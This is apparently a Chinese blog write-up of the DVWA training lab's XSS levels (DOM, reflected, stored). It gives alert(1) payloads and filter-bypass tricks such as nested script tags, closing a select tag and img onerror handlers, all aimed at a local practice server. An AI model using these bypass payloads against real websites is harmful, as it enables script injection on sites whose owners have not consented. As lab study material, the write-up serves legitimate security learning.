Brute Force(暴力(破解))、Command Injection(命令行注入)、CSRF(跨站请求伪造)、 File Inclusion(文件包含)、File Upload(文件上传)、Insecure CAPTCHA (不安全的验证码)、 SQL Injection(SQL注入)、SQL Injection(Blind)(SQL盲注)、XSS(DOM)(基于DOM树)、 XSS(Reflected)(反射型跨站脚本)、XSS(Stored)(存储型跨站脚本)
XSS(DOM)(基于DOM树)
等级low
<script>alert(1)</script>
http://127.0.0.1/dvwa/vulnerabilities/xss_d/?default=English
http://127.0.0.1/dvwa/vulnerabilities/xss_d/?default=%3Cscript%3Ealert(1)%3C/script%3E
Medium
过滤了<script 标签
<img src=# one rror=alert(1)>
F12看前端代码,CTRL+F查看default
需要闭合</select>
</select><img src=# one rror=alert(1)>
等级high
#<script>alert(1)</script>
http://127.0.0.1/dvwa/vulnerabilities/xss_d/?default=English#%3Cscript%3Ealert(1)%3C/script%3E
XSS(Reflected)(反射型跨站脚本)
low
?name=<script>alert(1)</script>#
Medium
将<script>标签替换为空
<scr<script>ipt>alert(1)</script>
high
对<script>使用了正则表达式替换
<img src=1 οnerrοr=alert(1)>
XSS(Stored)(存储型跨站脚本)
low
<script>alert(1)</script>
F12看前端代码,CTRL+F查看name
点击
Medium
$name = str_replace( '<script>', '', $name ); 将<script>标签替换为空
<scri<script>pt>alert(1)</script>
high
<img src=1 one rror=alert(1)>
翻译
搜索
复制
<iframe></iframe> 标签:XSS,name,DOM,default,DVWA,alert,SQL,靶场 From: https://www.cnblogs.com/TinKode123/p/17711890.html